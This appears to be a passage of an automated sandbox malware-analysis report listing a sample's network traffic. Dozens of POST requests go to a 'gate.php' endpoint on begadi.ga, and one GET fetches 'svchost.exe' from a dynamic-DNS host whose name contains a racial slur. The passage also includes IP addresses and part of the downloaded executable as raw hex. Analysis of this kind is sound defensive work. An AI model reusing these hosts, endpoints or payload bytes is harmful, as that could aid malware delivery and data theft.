              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Dec 2020 07:33:18 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Mon, 21 Dec 2020 04:54:47 GMTETag: "8ec00-5b6f241edd261"Accept-Ranges: bytesContent-Length: 584704Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 56 b1 8b 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e2 08 00 00 08 00 00 00 00 00 00 1e 01 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 00 09 00 53 00 00 00 00 20 09 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 e1 08 00 00 20 00 00 00 e2 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 05 00 00 00 20 09 00 00 06 00 00 00 e4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 09 00 00 02 00 00 00 ea 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 09 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 d1 06 00 e8 2e 02 00 03 00 00 00 a9 03 00 06 10 56 02 00 d0 7b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f 5d ed 3a 11 eb fd b4 77 bd ed 48 ae 33 e8 90 08 9d 63 b4 61 62 66 1c e5 d7 11 c2 c4 13 13 13 98 c8 89 05 25 1d fd a8 c3 cf 13 08 9f 1f fd 3b 78 3b 78 de 20 40 c3 92 d3 ee 6f 1d 70 92 31 c5 d4 f8 cf ea 1e c7 98 d7 15 47 0b 65 b0 cf 57 d2 e4 40 2b 95 cd 06 51 78 f0 ed 22 8f 42 f4 59 d5 7c 5e bd e8 43 09 b2 95 33 26 04 19 53 b5 08 7e 96 f9 ab 83 aa b2 cb 87 91 e8 c9 2f bd 9d 13 aa 0c 9e 75 76 2f 40 8f f1 69 4d 4d cb 25 09 16 1f e8 f6 27 fc 82 93 f9 eb 09 bd 3d 31 ea 34 7a 94 11 7c c5 29 0d e8 51 5c 0e 4b 55 93 db 16 4d 07 41 7b d8 7c 05 e3 f3 3b b1 12 a4 35 31 c2 46 1b 6c 70 a9 f2 65 16 1c 6e 69 79 11 d3 80 e5 43 a0 a6 d0 11 55 31 5c 4d d4 52 69 86 cb fb 05 de 0a 28 0f dd 89 52 3f e2 88 d5 45 4e 1f 25 1b c2 f6 cf 76 7e 92 1b 6c 80 97 b1 86 95 1f b5 98 23 24 05 1e 14 29 4a 2e 42 3d f6 35 d3 71 ea a4 d0 c1 40 55 d2 47 ee fb f4 b9 10 65 2e aa 63 f1 7a 0b f3 80 fd 84 5a 75 93 1
              Source: Joe Sandbox ViewIP Address: 103.141.138.119 103.141.138.119
              Source: Joe Sandbox ViewIP Address: 185.193.143.118 185.193.143.118
              Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
              Source: Joe Sandbox ViewASN Name: DIGITALENERGY-ASRU DIGITALENERGY-ASRU
              Source: global trafficHTTP traffic detected: GET /secure/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chnesstdyqudusisabadassniggainthestfmv.ydns.euConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
